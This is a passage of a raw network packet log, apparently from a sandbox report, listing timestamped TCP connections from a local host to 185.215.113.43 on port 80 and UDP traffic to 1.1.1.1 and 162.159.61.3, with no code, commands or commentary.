Nov 21, 2024 22:20:00.313216925 CET	50180	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:01.824384928 CET	50180	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:01.824733019 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:01.945899963 CET	80	50181	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:01.945976973 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:01.946012020 CET	80	50180	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:01.946083069 CET	50180	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:01.946501017 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:02.067691088 CET	80	50181	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:03.384702921 CET	80	50181	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:03.391720057 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:05.015703917 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:05.015721083 CET	50182	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:05.135792017 CET	80	50181	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:05.135915995 CET	80	50182	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:05.136027098 CET	50181	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:05.136137009 CET	50182	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:05.139697075 CET	50182	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:05.259402037 CET	80	50182	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:06.493705034 CET	80	50182	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:06.493773937 CET	50182	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:08.011090040 CET	50182	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:08.011400938 CET	50183	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:08.131081104 CET	80	50183	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:08.131165028 CET	50183	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:08.131252050 CET	80	50182	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:08.131335974 CET	50182	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:08.132091999 CET	50183	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:08.251813889 CET	80	50183	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:09.536072016 CET	80	50183	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:09.539803028 CET	50183	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:11.166985035 CET	50183	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:11.167469978 CET	50184	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:11.287053108 CET	80	50183	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:11.287125111 CET	80	50184	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:11.287221909 CET	50184	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:11.287270069 CET	50183	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:11.287513018 CET	50184	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:11.410490036 CET	80	50184	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:12.722920895 CET	80	50184	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:12.722981930 CET	50184	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:14.231518984 CET	50184	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:14.231944084 CET	50185	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:14.351811886 CET	80	50185	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:14.351887941 CET	50185	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:14.352101088 CET	80	50184	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:14.352153063 CET	50184	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:14.352327108 CET	50185	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:14.472017050 CET	80	50185	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:15.734050035 CET	80	50185	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:15.737824917 CET	50185	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:17.370145082 CET	50185	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:17.374437094 CET	50186	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:17.490524054 CET	80	50185	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:17.490654945 CET	50185	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:17.494167089 CET	80	50186	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:17.494340897 CET	50186	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:17.499715090 CET	50186	80	192.168.2.5	185.215.113.43
Nov 21, 2024 22:20:17.619666100 CET	80	50186	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:18.943212986 CET	80	50186	185.215.113.43	192.168.2.5
Nov 21, 2024 22:20:18.946099997 CET	50186	80	192.168.2.5	185.215.113.43

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2024 22:12:09.553951025 CET	51747	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:12:10.092015028 CET	53	51747	1.1.1.1	192.168.2.5
Nov 21, 2024 22:12:41.062479019 CET	58059	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:12:41.202162027 CET	53	58059	1.1.1.1	192.168.2.5
Nov 21, 2024 22:12:55.446929932 CET	53	61281	1.1.1.1	192.168.2.5
Nov 21, 2024 22:12:55.614888906 CET	53	59343	1.1.1.1	192.168.2.5
Nov 21, 2024 22:12:55.747128963 CET	59545	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:12:55.747296095 CET	51343	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:12:55.884210110 CET	53	59545	1.1.1.1	192.168.2.5
Nov 21, 2024 22:12:55.884414911 CET	53	51343	1.1.1.1	192.168.2.5
Nov 21, 2024 22:13:04.389655113 CET	59699	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:13:04.389847040 CET	53581	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:13:04.531960964 CET	53	53581	1.1.1.1	192.168.2.5
Nov 21, 2024 22:13:04.532634020 CET	52584	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:13:04.532836914 CET	61151	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:13:04.533422947 CET	64373	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:13:04.533668041 CET	63710	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:13:04.555814028 CET	54598	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:13:04.556057930 CET	49709	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:13:04.677383900 CET	53	61151	1.1.1.1	192.168.2.5
Nov 21, 2024 22:13:04.678039074 CET	53	52584	1.1.1.1	192.168.2.5
Nov 21, 2024 22:13:04.678234100 CET	53	64373	1.1.1.1	192.168.2.5
Nov 21, 2024 22:13:04.678967953 CET	53	63710	1.1.1.1	192.168.2.5
Nov 21, 2024 22:13:04.708657980 CET	53	54598	1.1.1.1	192.168.2.5
Nov 21, 2024 22:13:04.708810091 CET	53	49709	1.1.1.1	192.168.2.5
Nov 21, 2024 22:13:06.626144886 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:06.931485891 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.541313887 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.636600971 CET	62890	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:13:07.636924982 CET	51301	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:13:07.766055107 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.766086102 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.766098976 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.766258955 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.767528057 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.770507097 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.773762941 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.807219028 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.874216080 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:07.947014093 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.947384119 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.947766066 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.962184906 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.962184906 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:07.979012012 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.087486982 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.100692034 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.103388071 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.103399038 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.103408098 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.103415966 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.103992939 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.103992939 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.110403061 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.111118078 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.112572908 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.112639904 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.112648964 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.112834930 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.112838984 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.113171101 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.142824888 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.143188953 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.144882917 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.145708084 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.146018028 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.146756887 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.177970886 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.280291080 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.295002937 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.295861006 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.312115908 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.342075109 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.421154022 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.422588110 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.434396982 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.436014891 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.436506033 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:08.436664104 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:08.463630915 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:09.887264967 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.196542978 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.205593109 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.206226110 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.207395077 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.207650900 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.208204031 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.208519936 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.225703001 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.225831032 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.541954994 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.543675900 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.544429064 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.544531107 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.544540882 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.544641972 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.545150995 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.545262098 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.547038078 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.547274113 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.548763990 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.549063921 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.550458908 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.554465055 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.560585976 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.562129974 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.563282013 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.563653946 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.711946964 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.727874041 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.805864096 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.883462906 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.884583950 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.885160923 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.885262966 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.885562897 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.888860941 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.888875961 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.892196894 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.892527103 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:10.892818928 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.892932892 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:10.893719912 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.045653105 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.047744036 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.056803942 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.056860924 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.056873083 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.056926012 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.059011936 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.059613943 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.062402010 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.062699080 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.064353943 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.065490007 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.129991055 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.222791910 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.224425077 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.228198051 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.230916023 CET	443	64263	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.231374025 CET	64263	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.384042025 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.384375095 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.384383917 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.384392977 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.384991884 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.384991884 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.385876894 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.708272934 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:11.741363049 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.897905111 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:11.898416996 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:13:12.238511086 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:12.249749899 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:12.253951073 CET	443	60995	162.159.61.3	192.168.2.5
Nov 21, 2024 22:13:12.264631987 CET	60995	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:47.544872999 CET	63082	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:47.545123100 CET	59346	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:47.682447910 CET	53	59346	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:49.812057972 CET	62387	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:49.812057972 CET	50158	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.152337074 CET	52545	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.152535915 CET	60484	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.159936905 CET	62880	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.160165071 CET	49523	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.292320013 CET	53	60484	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:50.301636934 CET	49685	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.301794052 CET	56332	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.379450083 CET	61317	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.379761934 CET	51238	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.471117020 CET	53	52545	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:50.475274086 CET	51012	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.475532055 CET	64673	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:50.517303944 CET	53	51238	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:50.538228035 CET	53	56332	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:50.607620001 CET	53	49685	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:50.612916946 CET	53	64673	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:51.384736061 CET	62491	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:51.521653891 CET	53	62491	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:52.529969931 CET	62537	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:52.530227900 CET	65258	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:52.530817032 CET	55643	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:52.530930042 CET	58461	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:14:52.670985937 CET	53	62537	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:52.671003103 CET	53	55643	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:52.671098948 CET	53	58461	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:52.672946930 CET	53	65258	1.1.1.1	192.168.2.5
Nov 21, 2024 22:14:55.396536112 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:55.711136103 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.320415020 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.530664921 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.530679941 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.530689955 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.530695915 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.533121109 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.535867929 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.539155006 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.646274090 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.859833002 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.859994888 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.860003948 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.860013008 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.861140966 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.861186028 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:56.865117073 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.865921974 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.866004944 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:56.867005110 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:14:57.184626102 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:14:57.211062908 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:01.569169998 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:01.569396973 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:01.893433094 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:01.895030022 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:01.897376060 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:01.899406910 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:07.486726999 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:07.486821890 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:07.486999989 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:07.487159967 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:07.811280012 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:07.812757015 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:07.812901020 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:07.813173056 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:07.813797951 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:07.822972059 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:07.823183060 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:07.919032097 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:07.919186115 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:07.938241959 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:07.938323975 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:08.243386030 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:08.244448900 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:08.244878054 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:08.245045900 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:08.263058901 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:08.265345097 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:08.265608072 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:08.271364927 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:08.947881937 CET	51539	53	192.168.2.5	1.1.1.1
Nov 21, 2024 22:15:09.084690094 CET	53	51539	1.1.1.1	192.168.2.5
Nov 21, 2024 22:15:09.670593023 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:09.670816898 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:09.995209932 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:09.996721983 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:10.000088930 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:10.000421047 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:10.824744940 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:10.825036049 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:11.148966074 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.154201984 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.154211998 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.154445887 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:11.380884886 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:11.380951881 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:11.706016064 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.706185102 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.709158897 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.709906101 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:11.710561991 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.358328104 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.358411074 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.358540058 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.358592987 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.358671904 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.358773947 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.358808041 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.358982086 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.363178015 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.363254070 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.565484047 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.578134060 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.686114073 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.689986944 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.690079927 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.690737963 CET	53940	443	192.168.2.5	162.159.61.3
Nov 21, 2024 22:15:14.692188025 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.692270994 CET	443	53940	162.159.61.3	192.168.2.5
Nov 21, 2024 22:15:14.692280054 CET	443	53940	162.159.61.3	192.168.2.5
